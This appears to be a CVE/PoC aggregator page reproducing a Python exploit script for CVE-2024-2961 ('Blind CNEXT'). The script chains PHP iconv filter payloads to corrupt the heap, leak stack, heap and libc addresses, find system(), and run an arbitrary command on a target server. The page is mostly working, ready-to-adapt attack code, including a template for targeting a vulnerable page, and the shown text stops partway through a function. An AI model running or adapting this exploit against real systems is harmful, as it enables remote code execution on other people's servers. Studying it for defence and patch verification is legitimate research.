4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / blind-cnext-exploit.py PY
#!/usr/bin/env python3
#
# Blind CNEXT: Blind PHP file read to RCE (CVE-2024-2961)
# Date: 2024-09-30
# Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS)
#
# INFORMATIONS
#
# To use, implement the Remote class, which tells the exploit how to send the payload
# and how to verify that the blowup happened, i.e. that PHP went OOM.
#
# TODO
#
# If you feel like improving the exploit, please submit a PR. Here are some improvement
# ideas:
#
# - Automatic configuration of the oracle
# - Handle multithreading
# - Handle non-PIE ELFs
# - Properly handle ELF endianness
# - Use the libc's Build ID to find system faster 
# - Verify that we properly dump addresses that contain newline characters
#
# DEBUGGING
#
# This exploit is complex, and I may have made mistakes. Although it is built not to
# crash, it is a binary exploit, so it might anyway.
#
# If you encounter any issue, please provide the following information:
#
# - The full output of the exploit, with the `-d` flag
# - The exact code of the PHP page that is being attacked, or better, a docker image
#
# Unless I see both, issues will be automatically closed.
#
#
# TECHNICAL
#
# The exploit is a blind file read to RCE in PHP, using the iconv filter. Its behavior
# is documented in the following blog posts:
#
# https://www.ambionics.io/blog/iconv-cve-2024-2961-p1
# https://www.ambionics.io/blog/iconv-cve-2024-2961-p3
#

from __future__ import annotations

import base64
import itertools
import zlib
from collections import Counter
from dataclasses import dataclass, field
from typing import NoReturn
from requests.exceptions import ConnectionError, ChunkedEncodingError
import time
from rich.align import Align

from rich.rule import Rule

from ten import *

import struct

set_message_formatter("Icon")

# sys.path.append(os.path.join(os.path.dirname(__file__), "php_filter_chains_oracle_exploit"))
from php_filter_chains_oracle_exploit.filters_chain_oracle.core.bruteforcer import (
    Bruteforcer,
)

MAX_COMPRESSED_LEN = 1500
MAX_PATH_LEN = 9000

from tenlib import logging


# -- Constants

HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")
MIN_NB_400_CHUNKS = 100
CS = 0x400  # bin=23, chunks=8, pages=2
ZERO_CHUNK = b"0" * CS
ZERO_CHUNK_30 = b"0" * 0x30
NB_30_CHUNKS = 85 * 5
NB_30_CHUNKS_2 = NB_30_CHUNKS + 85 * 5
PAGE_SIZE = 0x1000

PHP_ELF_MIN_PAGE_DISTANCE = 1500
PHP_ELF_MAX_PAGE_DISTANCE = 3000


class Remote:
    """A helper class to send the payload and check whether a blowup happened.

    The logic of the exploit is always the same, but the exploit needs to know how to
    send the payload and how to check if a blowup happened. A blowup is when PHP tries
    to allocate too much memory and returns an error such as:
    
        Allowed memory size of 134217728 bytes exhausted

    The code here serves as an example that attacks a page that looks like:

    ```php
    <?php
    
    ini_set('display_errors', 1);
    file_get_contents($_POST['file']);
    ```

    Tweak it to fit your target, and start the exploit.
    """

    def __init__(self, url: str) -> None:
        self.url = url
        self.session = Session()

    def oracle(self, path: str) -> bool:
        """Sends given `path` to the HTTP server. Returns whether a blowup happened."""
        write("/tmp/payload", path)
        try:
            response = self.session.post(self.url, data={"file": path})
        except ConnectionError:
            raise RuntimeError("Connection error, server crashed or timeout!")
        return response.contains("Allowed memory size of")


@entry
@arg("url", "Target URL")
@arg("command", "Command to run on the system; limited to 0x140 bytes")
@arg("sleep", "Time to sleep to assert that the exploit worked. By default, 1.")
@arg("alignment", "Number of 0x400 chunks to spawn so that we overflow into the penultimate one of a page.")
@arg("brig_inp", "Address of the brig_inp variable on the stack.")
@arg("heap", "Address of the zend_mm_heap object.")
@arg("php_elf", "Address of the PHP ELF in memory.")
@arg("zval_ptr_dtor", "Address of `zval_ptr_dtor` in memory.")
@arg("libc_elf", "Address of the libc ELF in memory.")
@arg("system", "Address of the `system` function in the libc.")
@arg("malloc", "Address of the `malloc` function in the libc.")
@arg("realloc", "Address of the `realloc` function in the libc.")
@arg("debug", "Display DEBUG log messages in the CLI.")
@dataclass
class Exploit:
    """Blind CNEXT exploit: RCE using a blind file read primitive in PHP, using CVE-2024-2961.
    cfreal @ LEXFO/AMBIONICS
    """

    url: str
    command: str
    alignment: int = None
    brig_inp: str = None
    heap: str = None
    php_elf: str = None
    zval_ptr_dtor: str = None
    libc_elf: str = None
    system: str = None
    malloc: str = None
    realloc: str = None
    sleep: int = 1
    debug: bool = False

    BLOW_UP_UTF32 = "convert.iconv.L1.UCS-4"
    BLOW_UP_INFINITY = [BLOW_UP_UTF32] * 15

    # TODO Is it really needed now? 
    FILTER_USAGE = (
        # Base filters
        Counter(
            {
                "zlib.inflate": 3,
                "dechunk": 5,
                "convert.iconv.L1.L1": 2,
                "convert.iconv.UTF-8.ISO-2022-CN-EXT": 1,
                "zlib.deflate": 1,
                "convert.base64-encode": 1,
            }
        )
        # Character selection
        + Counter(
            {
                # "convert.base64-decode": 70,
                # "convert.base64-encode": 70,
                "convert.iconv.UTF8.CSISO2022KR": 42,
                "convert.iconv.JS.UNICODE": 14,
                "convert.iconv.L4.UCS2": 14,
                "convert.iconv.UTF-16LE.UTF-16BE": 8,
                "convert.iconv.UCS-4LE.UCS-4": 8,
                "convert.iconv.L1.UTF7": 6,
            }
        )
        # Other script
        + Counter(
            {
                "dechunk": 1,
                "convert.iconv.L1.UCS-4": 15,
                "convert.iconv.437.CP930": 6,
                "convert.quoted-printable-encode": 5,
                "convert.iconv..UTF7": 5,
                "convert.base64-decode": 5,
                "convert.base64-encode": 6,
                "string.tolower": 2,
                "convert.iconv.CSISO5427CYRILLIC.855": 1,
                "convert.iconv.CP1390.CSIBM932": 5,  # was 1, bumped to 5
                "string.rot13": 2,
                "convert.iconv.CP285.CP280": 1,
                "string.toupper": 1,
                "convert.iconv.CP273.CP1122": 1,
                "convert.iconv.500.1026": 1,
                "convert.iconv.UTF8.IBM1140": 1,
                "convert.iconv.CSUNICODE.UCS-2BE": 1,
                "convert.iconv.UTF8.CP930": 1,
            }
        )
    )
    # FILTER_USAGE = Counter()

    # Oracle tests to determine if the base64 digit is what we expect
    FAST_PATH = {
        "f": [
            (False, ["convert.iconv.CP1390.CSIBM932"] * 5),
            (False, []),
        ],
        "g": [
            (False, ["convert.iconv.CP1390.CSIBM932"]),
            (True, []),
        ],
        "A": [
            (
                False,
                [
                    "string.tolower",
                    "convert.iconv.437.CP930",
                    "convert.quoted-printable-encode",
                    "convert.iconv..UTF7",
                    "convert.base64-decode",
                    "convert.base64-encode",
                    "convert.iconv.437.CP930",
                    "convert.quoted-printable-encode",
                    "convert.iconv..UTF7",
                    "convert.base64-decode",
                    "convert.base64-encode",
                    "convert.iconv.437.CP930",
                    "convert.quoted-printable-encode",
                    "convert.iconv..UTF7",
                    "convert.base64-decode",
                    "convert.base64-encode",
                    "convert.iconv.437.CP930",
                    "convert.quoted-printable-encode",
                    "convert.iconv..UTF7",
                    "convert.base64-decode",
                    "convert.base64-encode",
                    "convert.iconv.437.CP930",
                ],
            ),
            (
                True,
                [
                    "convert.iconv.437.CP930",
                    "convert.quoted-printable-encode",
                    "convert.iconv..UTF7",
                    "convert.base64-decode",
                    "convert.base64-encode",
                    "convert.iconv.437.CP930",
                    "convert.quoted-printable-encode",
                    "convert.iconv..UTF7",
                    "convert.base64-decode",
                    "convert.base64-encode",
                    "convert.iconv.437.CP930",
                    "convert.quoted-printable-encode",
                    "convert.iconv..UTF7",
                    "convert.base64-decode",
                    "convert.base64-encode",
                    "convert.iconv.437.CP930",
                    "convert.quoted-printable-encode",
                    "convert.iconv..UTF7",
                    "convert.base64-decode",
                    "convert.base64-encode",
                    "convert.iconv.437.CP930",
                ],
            ),
        ],
        "B": [
            (False, ["string.tolower", "convert.iconv.CP1390.CSIBM932"]),
            (
                True,
                [
                    "string.tolower",
                    "convert.iconv.CP1390.CSIBM932",
                    "convert.iconv.CP1390.CSIBM932",
                ],
            ),
            (True, ["convert.iconv.CP1390.CSIBM932"]),
        ],
    }

    def __post_init__(self) -> None:
        self.remote = Remote(self.url)
        self.logger = logger("EXPLOIT")
        self.info = {}

    #
    # Building and sending payload
    #

    def _get_response(self, filters: list[str], resource: str) -> Response:
        path = self._build_filter_payload(filters, resource)
        response = self.remote.oracle(path)
        log.trace(
            f"Sending {len(path):#x} payload results in a response of {len(response.content)} bytes"
        )
        return response

    def oracle(self, filters: list[str], resource: str) -> bool:
        """Returns true if the expansion happened, false otherwise."""
        path = self._build_filter_payload(filters, resource)
        blowup = self.remote.oracle(path)
        self.logger.trace(f"Sending payload of size {len(path)} results in {blowup=}")
        return blowup

    def _build_filter_payload(self, filters: list[str], resource: str) -> str:
        read = "|".join(filters)
        write = self._compute_write(filters)
        path = f"php://filter/read={read}/write={write}/resource={resource}"
        return path

    @classmethod
    def _compute_write(cls, filters: list[str]) -> str:
        """To make sure that the heap does not change too much, we add dummy filters so
        that PHP creates the associated structures. They do not impact our exploit, as
        they are write filters. However, they will be called when the stream is finally
        freed, at the end of the execution. We thus convert any funky charset to latin1,
        to make sure PHP does not report errors. This also makes sure that the length of
        the path is always the same.

        Although this is very helpful, this is not perfect. The order in which the
        filters are created matters as well. However, we cannot control this perfectly.
        """
        filters = Counter(filters)
        missing = []

        for filter, number in cls.FILTER_USAGE.items():
            used = filters.get(filter, 0)
            if filter.startswith("convert.iconv."):
                _, _, ffrom, fto = filter.split(".")
                if len(ffrom) >= 2:
                    ffrom = "L1".ljust(len(ffrom), " ")
                if len(fto) >= 2:
                    fto = "L1".ljust(len(fto), " ")
                filter = f"convert.iconv.{ffrom}.{fto}"
            if used < number:
                missing += [filter] * (number - used)

        # assert (Counter(missing) + Counter(filters) == Counter(cls.FILTER_USAGE))
        return "|".join(missing)

    #
    # Exploit logic
    #

    def find_chunk_alignment(self) -> int:
        """Determines the required number of 0x400 chunks to overflow into the
        penultimate one, yielding a A->B->C' chain with C overflowing into the next
        page.
        """
        assert self.alignment is None

        # We should only need 8, in theory, but this won't hurt too much
        for i in track(
            range(MIN_NB_400_CHUNKS, MIN_NB_400_CHUNKS + 8),
            "Looking for chunk alignment",
        ):
            if self._try_big_chunks_alignment(i):
                break
        else:
            # TODO CHECK IF VULNERABLE
            failure("Unable to find heap alignment; is the target vulnerable?")

        msg_success(f"Found alignment for [i]0x400[/] chunks: {i} {option_help('-a')}")
        self.alignment = i

    def _try_big_chunks_alignment(self, alignment: int) -> bool:
        # After the overflow, PHP will allocate a chunk twice as big to store the iconv'
        # ed buffer. Since there was a one byte overflow, the byte at offset 0x100 in
        # the new out_buf (of size 0x200) will keep its value. If this value is 0x0A, it
        # will break the logic of the code (the `dechunk` that comes right after will
        # fail). To avoid this, we create, early in the algorithm, a chunk of size 0x200
        # that will be the head of the FL.
        step1_800 = [b"0" * CS * 2]
        step1_400 = [ZERO_CHUNK] * alignment
        step1_30 = [ZERO_CHUNK_30] * NB_30_CHUNKS

        step1 = self.build_conserved_chunks(step1_800 + step1_400 + step1_30, step=1)

        PTR_CHUNK = bytearray(ZERO_CHUNK)
        put(PTR_CHUNK, 0x48 - 8 * 2, b"0000013\n0000001-" + p64(0) + b"\n0\n\n")

        step2 = [PTR_CHUNK] + [ZERO_CHUNK] * 2
        step2 = self.build_conserved_chunks(step2, step=2)

        # Overflow step

        step3_overflow = bytearray(b"0" * CS)
        put(step3_overflow, -len(BUG), BUG)
        put(step3_overflow, -len(BUG) - 3, b"1e-")
        tapis = bytearray(b"T" * CS)
        put(tapis, -0x48 + 0x30 - 5, b"\na\nff" + p64(0) + b"\nAAABBBB" + p64(0))
        end_chunk = bytearray(b"E" * CS)
        put(end_chunk, 0, b"\nX\n")
        step3 = (
            [step3_overflow]
            + [b"0"]
            + [ZERO_CHUNK] * 2
            + [tapis]
            + [end_chunk]
            + [b"3" * 0x30] * (NB_30_CHUNKS_2)
        )
        step3 = self.build_conserved_chunks(step3, step=4)

        pages = b"" + step1 + step2 + step3

        resource = self._data_to_resource(pages)
        base_filters = (
            Filters.base(3)
            # Step 5: Remove data if possible
            + [
                "dechunk",
                "dechunk",
                "dechunk",
            ]
            + self.BLOW_UP_INFINITY
        )

        return self.oracle(base_filters, resource)

    def dump_memory(self, address: int, size: int, message: str = None) -> None:
        """Dumps `size` bytes of memory at `address`.
        """
        total = b""

        if message:
            message = message.format(address=address, size=size)
            generator = lambda: track(range(0, size, 3), message)
        else:
            generator = lambda: range(0, size, 3)

        for p in generator():
            hope = self.dump_3(address + p, nb_bytes=size - p)
            total += base64.decode(hope)
            # print(hexdump(total, total=False))

        return total

    def expect_memory(self, address: int, expected: bytes) -> bool:
        """Returns true if the memory at `address` matches the `expected` bytes.
        """
        size = len(expected)

        for p in range(0, size, 3):
            try:
                self.dump_3(address + p, expected=expected[p : p + 3])
            except UnexpectedBytesException:
                return False
        return True
    
    def _maybe_convert_arguments(self) -> None:
        for attr in ("brig_inp", "heap", "zval_ptr_dtor", "php_elf", "libc_elf", "system", "malloc", "realloc"):
            value = getattr(self, attr)
            if value is not None:
                setattr(self, attr, unhex(value))

    def run(self) -> None:
        if self.debug:
            logging.set_cli_level("DEBUG")
            
        self._maybe_convert_arguments()
        
        got_final_params = self.heap and self.system and self.malloc and self.realloc
        
        # We need to find out at least one parameter before we can execute code
        if not got_final_params:
            # Do we have everything we need to perform arbitrary reads?
            if not self.alignment or not self.brig_inp:
                msg_print(Rule("READ PRIMITIVE"))
                
                if not self.alignment:
                    self.find_chunk_alignment()
                
                if not self.brig_inp:
                    self.leak_stack_address()
            
            # Do we have the heap? If we do, do we need to find the PHP ELF ?
            if not self.heap or not (self.system or self.libc_elf or self.php_elf or self.zval_ptr_dtor):
                msg_print(Rule("HEAP"))
                
                if not self.heap:
                    self.find_heap_address()
                
                if not self.zval_ptr_dtor:
                    self.find_zval_ptr_dtor()
            
            # Do we have the PHP ELF? If we don't, do we need it?
            if not (self.php_elf or self.libc_elf or self.system):
                msg_print(Rule("PHP ELF"))
                
                self.find_php_elf()
                address = self.find_some_libc_function()
            
            if not self.libc_elf:
                msg_print(Rule("LIBC ELF"))
                
                self.find_libc_elf(address)
            
            self.find_libc_functions()
        
        msg_print(Rule("CODE EXECUTION"))
        
        self.execute()
        
    def find_some_libc_function(self) -> int:
        php = ELFDumper(self, self.php_elf)
        php.get_dynamic_section()
        php.get_dynamic_segments("STRTAB", "SYMTAB", "JMPREL")
        return php.find_some_libc_function()
        
    def find_libc_elf(self, address: int):
        """Finds the address of the libc ELF in memory from a function it contains.
        """
        assert self.libc_elf is None
        
        libc = self._find_elf_header(address, 0, PHP_ELF_MAX_PAGE_DISTANCE)
        msg_success(f"Found [i]libc[/] ELF at {addr(libc)} {option_help('-l')}")
        self.libc_elf = libc

    def find_libc_functions(self) -> None:
        assert self.system is None
        
        elf = ELFDumper(self, self.libc_elf)
        elf.setup_gnu_hash()
        
        for symbol in ("system", "malloc", "realloc"):
            try:
                function = elf.find_symbol_from_hash(symbol)
            except ValueError as e:
                failure(str(e))
                
            function += elf.base
            shortcut = f"-{symbol[0]}"
            
            msg_success(f"Found [i]{symbol}@libc[/] at address {addr(function)} {option_help(shortcut)}")
            setattr(self, symbol, function)

    def russian_doll(self, payload: bytes, *sizes) -> bytes:
        """Returns a payload that, when successively dechunked, has its size changed to
        `sizes`.
        """
        for size in sizes:
            if size < 0:
                size = len(payload) - size
            elif size == 0:
                size = len(payload) + 8
            payload = chunked_chunk(payload, size)
        payload = compressed_bucket(payload)
        return payload

    def _data_to_resource(self, data: bytes) -> str:
        """Converts the given bytes to a `data://` url. Compresses the input twice."""
        resource = compress(compress(data))
        if len(resource) > MAX_COMPRESSED_LEN:
            failure(f"Resource too big: {len(resource)} > {MAX_COMPRESSED_LEN}")
        # resource = resource.ljust(MAX_COMPRESSED_LEN, b"A")
        
        # The resource will be B64-decoded into a zend_string, so we need to make sure
        # that this does not account to a zend_string of size 0x400, which would mess
        # with our setup.
        resource = resource.ljust(0x400, b"\x00")
        resource = b64(resource)
        resource = f"data:text/plain;base64,{resource.decode()}"
        return resource

    def ptr_bucket(self, *ptrs, size: int, strip: int = 0) -> bytes:
        """Creates a 0x8000 chunk that reveals pointers after every step has been ran."""
        bucket = b"".join(map(p64, ptrs))
        if strip:
            bucket = bucket[:-strip]

        if size is not None:
            assert len(bucket) == size, f"{len(bucket):#x} != {size=:#x}"
        bucket = qpe(bucket)
        bucket = self.russian_doll(bucket, 0, 0, 0)
        return bucket

    def leak_stack_address(self):
        """Overwrites a buffer that we control with a php_stream_bucket structure and
        uses it to leak the address of the stack.

        The general idea is to displace the last 0x400 chunk of a page, allocate it,
        and then allocate buckets in the page right after. Buckets get "imprinted" into
        the chunk, and we can then extract the pointers.

        A naive implementation, although very small, easy to understand, and classy, may
        yield crashes in 1/8 cases. If we overflow from the penultimate 0x400 chunk, we
        overwrite a pointer to NULL, and the upcoming allocation crashes. We can avoid
        this by first setting up the freelist (ensuring there are enough chunks), then
        doing the process. It greatly complexifies the exploit, because now we need to
        allocate lots chunks of size 0x30 right after we setup the 0x400 FL (step1), but
        then free them all before we overflow and displace the chunk, so that we can
        finally reallocate them, and have them be imprinted into the chunk. It's all a
        matter of doing things in order: we want to setup our heap, then clear it, and
        then imprint the buckets. The "naive" payload is twice as big (2000 against
        1000) but it avoids crashes. We're doing web stuff, we don't want crashes.
        """
        assert self.brig_inp is None

        # After the overflow, PHP will allocate a chunk twice as big to store the iconv'
        # ed buffer. Since there was a one byte overflow, the byte at offset 0x100 in
        # the new out_buf (of size 0x200) will keep its value. If this value is 0x0A, it
        # will break the logic of the code (the `dechunk` that comes right after will
        # fail). To avoid this, we create, early in the algorithm, a chunk of size 0x200
        # that will be the head of the FL.
        step1_800 = [b"0" * CS * 2]
        step1_400 = [ZERO_CHUNK] * self.alignment
        step1_30 = [ZERO_CHUNK_30] * NB_30_CHUNKS

        step1 = self.build_conserved_chunks(step1_800 + step1_400 + step1_30, step=1)

        PTR_CHUNK = bytearray(ZERO_CHUNK)
        put(PTR_CHUNK, 0x48 - 8 * 2, b"0000013\n0000001-" + p64(0) + b"\n0\n\n")

        step2 = [PTR_CHUNK] + [ZERO_CHUNK] * 2
        step2 = self.build_conserved_chunks(step2, step=2)

        # Overflow step

        step3_overflow = bytearray(b"0" * CS)
        put(step3_overflow, -len(BUG), BUG)
        put(step3_overflow, -len(BUG) - 3, b"1b-")
        tapis = bytearray(b"T" * CS)
        put(tapis, -0x48 + 0x30 - 1, b"\n")
        put(tapis, -0x48 + 0x30, p64(0))
        end_chunk = bytearray(b"E" * CS)
        put(end_chunk, 3, b"\n")
        step3 = (
            [step3_overflow]
            + [b"0"]
            + [ZERO_CHUNK] * 2
            + [tapis]
            + [end_chunk]
            # protect misplaced chunk from being used
            + [ZERO_CHUNK] * 2 
            + [b"3" * 0x30] * (NB_30_CHUNKS_2)
        )
        step3 = self.build_conserved_chunks(step3, step=4)

        pages = b"" + step1 + step2 + step3

        resource = self._data_to_resource(pages)
        base_filters = Filters.base(3) + [
            "dechunk",
            "convert.base64-encode",
        ]
        full_dump = ""

        resource = self._data_to_resource(pages)

        wanted_digits = range(21, 28)

        for i in track(
            wanted_digits,
            "Extracting stack pointer",
        ):
            # Build a list of filters that puts the character we're interested in in
            # front
            quartet, digit = divmod(i, 4)
            quartet_filters = (Filters.REMOVE_EQUALS + Filters.DITCH_4) * quartet
            digit_filters = Filters.QUARTET_DIGITS[digit] + quartet_filters[1:]
            digit_filters = base_filters + digit_filters

            bruteforcer = LinkedBruteforcer(self, digit_filters, resource)
            for digit, _ in bruteforcer.bruteforce():
                full_dump += digit
                break
            else:
                failure("Unable to find character")

        pointer_part = base64.decode("A" + full_dump)[1:]
        brig_inp = u64(pointer_part + b"\x7f\x00\x00")
        brig_inp = brig_inp + 0x10
        msg_success(f"Got (stack) address of [i]brig_inp[/]: {addr(brig_inp)} {option_help('-b')}")
        self.brig_inp = brig_inp

    def _build_bucket(self, address: int, size: int) -> bytes:
        """Builds a bucket whose buffer has size `size` and points to the given
        `address`.
        """
        return b"".join(
            map(
                p64,
                [
                    0x00,  # next
                    0x00,  # prev
                    self.brig_inp,  # brigade
                    address,  # buf
                    size,  # len
                    0x10_0000_00_00,  # refcount hole is_persistent own_buf
                ],
            )
        )

    def find_heap_address(self) -> None:
        """Reads the stack to extract a pointer to a bucket, and then leaks the address
        of the zend_mm_heap object.
        """
        assert self.heap is None
            
        md = MemoryDumper(self, 0)
        (bucket,) = md.unpack(
            self.brig_inp - 0x10, "<Q", message="Leaking bucket address from [i]brig_inp[/]"
        )
        msg_info(f"Leaked bucket address: {addr(bucket)}")
        chunk = bucket & ~(0x200000 - 1)
        
        if bucket == 0:
            failure("Cannot leak heap address: bucket is NULL")
        
        (heap,) = md.unpack(
            chunk, "<Q", message="Leaking [i]zend_mm_heap[/] from heap chunk"
        )
        msg_success(f"Leaked [i]zend_mm_heap[/]: {addr(heap)} {option_help('-H')}")
        self.heap = heap
    
    def _try_fast_path(self, filters: list[str], resource: str, expected_digit: str) -> None | NoReturn:
        """Uses the fast_path tests to determine if the digit is `expected_digit`.
        """
        fast_path = self.FAST_PATH[expected_digit]

        for keep_if_blow, test_filters in fast_path:
            test_filters = (
                filters + test_filters + ["dechunk"] + self.BLOW_UP_INFINITY
            )
            blew_up = self.oracle(test_filters, resource)

            if keep_if_blow != blew_up:
                break
        else:
            self.logger.trace(f"Fast path hit for digit {expected_digit}")
            return
        
        self.logger.trace(f"Fast path missed for digit {expected_digit}")
        raise UnexpectedBytesException()
    
    def dump_3(self, address: int, expected: str = None, nb_bytes: int = 3) -> None:
        """Dumps 3 bytes (4 base64 digits) from `address`."""
        
        # In step 1, we allocate lots of 0x400 chunks to setup the heap, and then right
        # after we allocate 0x30 chunks. The latter will stay, while the former will be
        # removed on the next step.

        # After the overflow, PHP will allocate a chunk twice as big to store the iconv'
        # ed buffer. Since there was a one byte overflow, the byte at offset 0x400 in
        # the new out_buf (of size 0x800) will keep its value. If this value is 0x0A, it
        # will break the logic of the code (the `dechunk` that comes right after will
        # fail). To avoid this, we create, early in the algorithm, a chunk of size 0x200
        # that will be the head of the FL.
        step1_800 = [b"0" * CS * 2]
        step1_400 = [ZERO_CHUNK] * self.alignment
        step1 = self.build_conserved_chunks(step1_800 + step1_400, step=1)

        step1_30 = [ZERO_CHUNK_30] * NB_30_CHUNKS
        step1_30 = self.build_conserved_chunks(step1_30, dechunks=2)
        step1 += step1_30

        # In step 2, we put a NULL pointer in the last chunk of the page, and then we
        # reverse the free list for 3 elements A B C. The 0x30 chunks do not move.
        # We make the chunk that contains the fake pointer a doubly-chunked chunk, so
        # that we don't break the dechunk chain

        PTR_CHUNK = bytearray(ZERO_CHUNK)
        put(PTR_CHUNK, 0x48 - 8 * 2, b"0000013\n0000001-" + p64(0) + b"\n0\n\n")

        step2 = [PTR_CHUNK] + [ZERO_CHUNK] * 2
        step2 = self.build_conserved_chunks(step2, step=2)

        # In step 3, we overflow from A into B to change its next pointer to C+48h.

        step3_overflow = bytearray(ZERO_CHUNK)
        put(step3_overflow, -len(BUG), BUG)
        put(step3_overflow, -len(BUG) - 4, b"1b-")
        step3 = [step3_overflow, b"0"]
        step3 = self.build_conserved_chunks(step3, step=3)

        # In step 4, we overwrite a bucket

        BUCKET = self._build_bucket(address, 3)
        
        # TODO for loop this
        # TODO properly implemented?
        newlines = BUCKET.count(b"\x0a")
        match newlines:
            case 0:
                prefix = b"ffff-"
            case 1:
                prefix = b"5\nffff-\nffff-"
            case 2:
                prefix = b"d\n5\nffff-\nffff-\nffff-"
            case _:
                msg_debug("Leaking addresses that contain more than 2 newlines is DOABLE, just not implemented yet")
                failure("Cannot leak address: contains too many newlines")
        
        dechunks = ["dechunk"] * (newlines + 1)
            
        # Every chunk created here will preceed the data we want to leak. We need to
        # make it dechunkable. If addresses didn't contain newlines, it would be easy
        # enough.
        step5_overwrite_bucket = bytearray(ZERO_CHUNK)
        put(step5_overwrite_bucket, -0x48, BUCKET)
        put(step5_overwrite_bucket, -0x48-len(prefix), prefix)
        # Get rid of the last bytes: we don't want to overwrite the second bucket of
        # the page
        step5_overwrite_bucket = step5_overwrite_bucket[:-0x18]
        
        # Final chunk: directly preceeds the leaked data
        final = bytearray(ZERO_CHUNK)
        put(final, -1, b"\n")
        
        step5 = [ZERO_CHUNK, ZERO_CHUNK, step5_overwrite_bucket, ZERO_CHUNK, ZERO_CHUNK, ZERO_CHUNK, final]
        step5 = [qpe(chunked_chunk(chunk, CS*2)) for chunk in step5]
        step5 = self.build_conserved_chunks(step5, step=3)
        
        step4 = b""

        # Merge pages

        pages = step5 + step4 + step1 + step2 + step3

        resource = self._data_to_resource(pages)
        base_filters = Filters.base(2) + [
            "convert.iconv.L1.L1",
            # Step 4: Overwrite buffer
            "convert.quoted-printable-decode",
            "dechunk",
            "convert.iconv.L1.L1",
            # Step 5: Remove the stuff preceding the leaked data
        ] + dechunks + [
            # Step 6: Inprint the data
            # "zlib.deflate",
            # "zlib.inflate",
            "convert.base64-encode",
        ]

        # The four (or less, if nb_bytes if lower) characters that we need to dump
        quartet = ""

        # If some characters in the B64 quartet are expected, we can check if a fast
        # path exists  for them, and hit it instead of bruteforcing the digit and then
        # comparing it to the expected value.
        # b64_expected represents every B64 digit that is expected. We cannot
        # naively convert to B64 because some bytes may be incomplete.
        #
        # Quick example: we expect b"Z", so we b64-encode and get "Wg==". In this, W
        # encodes the first 6 bits of Z, and g the last 2. We cannot naively compare g
        # with the second character of the leak, because the latter also encodes the 4
        # first bits of the second byte of memory.
        
        if expected:
            b64_expected = b64(expected).decode()
            match len(expected):
                case 1:
                    b64_expected = b64_expected[:1]
                case 2:
                    b64_expected = b64_expected[:2]
                case 3:
                    pass
        else:
            b64_expected = ""

        for i, get_digit in enumerate(Filters.QUARTET_DIGITS):
            if len(quartet) > nb_bytes:
                break
            
            filters = base_filters + get_digit

            if i < len(b64_expected) and b64_expected[i] in self.FAST_PATH:
                base64_digit = b64_expected[i] 
                self._try_fast_path(filters, resource, base64_digit)
                quartet += base64_digit
                continue

            bruteforcer = LinkedBruteforcer(self, filters, resource)

            for digit, _ in bruteforcer.bruteforce():
                break
            else:
                failure("Could not find the character")

            quartet += digit

            # We compare the size of a B64 to a normal byte array, but the comparison
            # still holds.
            if expected:
                self._check_quartet_chunk_is_expected(quartet, expected)
                if len(quartet) > len(expected):
                    break

        self.logger.trace(f"Got quartet {quartet} for address {address:#x}")
        return quartet.ljust(4, "=")

    def _check_quartet_chunk_is_expected(
        self, quartet: str, expected: bytes
    ) -> None | NoReturn:
        """Checks that the dumped quartet matches what is expected."""
        digits = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

        def b64_number(data: bytes) -> int:
            return sum(
                digits.index(digit) << (6 * (3 - i)) for i, digit in enumerate(data)
            )

        def number(data: bytes) -> int:
            return sum(byte << (8 * (2 - i)) for i, byte in enumerate(data))

        mask = 24 - min(len(expected) * 8, len(quartet) * 6)
        mask = (1 << 24) - 1 - ((1 << mask) - 1)

        number_quartets = b64_number(quartet) & mask
        number_expected = number(expected) & mask

        # print(f"{number_quartets=:24b}")
        # print(f"{number_expected=:24b}")
        # print(f"           {mask=:24b}")

        if number_quartets != number_expected:
            self.logger.debug(
                f"Expected {number_expected:03x} but got {number_quartets:03x}"
            )
            raise UnexpectedBytesException()

    def build_conserved_chunks(
        self, buckets: list[bytes], dechunks: int = 0, step: int = 1
    ) -> bytes:
        """Builds a list of chunks that will be conserved during the exploit."""
        total_size = sum(map(len, buckets))
        prefix = ""
        suffix = b""

        wraps = [0] * (step - 1)

        for i in range(dechunks):
            current_size = i * 8 + total_size
            prefix = f"{current_size:06x}\n" + prefix
            suffix += b"\n"

        prefix = prefix.encode()

        if prefix:
            prefix = self.russian_doll(prefix, *wraps)
            suffix = self.russian_doll(suffix, *wraps)

        middle = b"".join(self.russian_doll(bucket, *wraps) for bucket in buckets)

        return prefix + middle + suffix
    
    def find_zval_ptr_dtor(self) -> int:
        """Finds the address of the `_zval_ptr_dtor` function in memory. To do so, we
        look for a page that contains `zend_array` structures, and then we look for the
        `pDestructor` field of the structure.
        """
        assert self.zval_ptr_dtor is None
        
        skip_until = 0
        heap = MemoryDumper(self, self.heap)

        for page in track(range(1, 512), "Looking for a [i]zend_array[/] page"):
            if page < skip_until:
                continue
            offset = -0x40 + 0x0208 + 4 * page

            (page_type,) = heap.dump(offset + 3, 1)
            if page_type == 0x40:
                (nb_pages,) = heap.unpack(offset, "<H")
                skip_until = page + nb_pages
                self.logger.debug(
                    f"Heap parsing, page #{page}: big allocation of {nb_pages} pages"
                )
            elif page_type == 0x80:
                self.logger.debug(f"Heap parsing, page #{page}: small allocation")
                # Find a page that contains arrays (0x38 has bin number 6)
                value = heap.expect(offset, b"\x06")
                if value:
                    self.logger.info(f"Heap parsing, page #{page}: 0x38 page")
                    msg_info(
                        f"Found first [i]zend_array (0x38)[/] page at [i]#{page}[/]"
                    )
                    page = heap.offset(-0x40 + PAGE_SIZE * page)
                    break
        else:
            failure("Unable to find [i]zend_array[/] page")

        for p in track(range(0, 0x1000, 0x38), "Looking for [i]_zval_ptr_dtor[/]"):
            # Check that the structure has type 7 (IS_ARRAY)
            page.expect(p+4, b"\x07\x00\x00\x00")
            # Extract the last pointer, pDestructor
            (pointer,) = page.unpack(p + 0x30, "<Q")
            self.logger.trace(f"Found potential zend_array, pDestructor: {pointer:#x}")

            if pointer >> 40 in (0x7F, 0x55, 0x56):
                msg_info(f"Found [i]_zval_ptr_dtor[/]: {addr(pointer)} {option_help('-z')}")
                break
        else:
            failure("Unable to find [i]zval_ptr_dtor[/] in main heap")
            
        self.zval_ptr_dtor = pointer
        
    def _find_elf_header(self, address: int, min: int, max: int) -> int:
        """Finds the ELF header of a file given a function pointer."""
        
        md = MemoryDumper(self, 0)
        address = address & ~(PAGE_SIZE - 1)
        distances = range(min, max)
        
        for i in track(distances, "Looking for ELF header"):
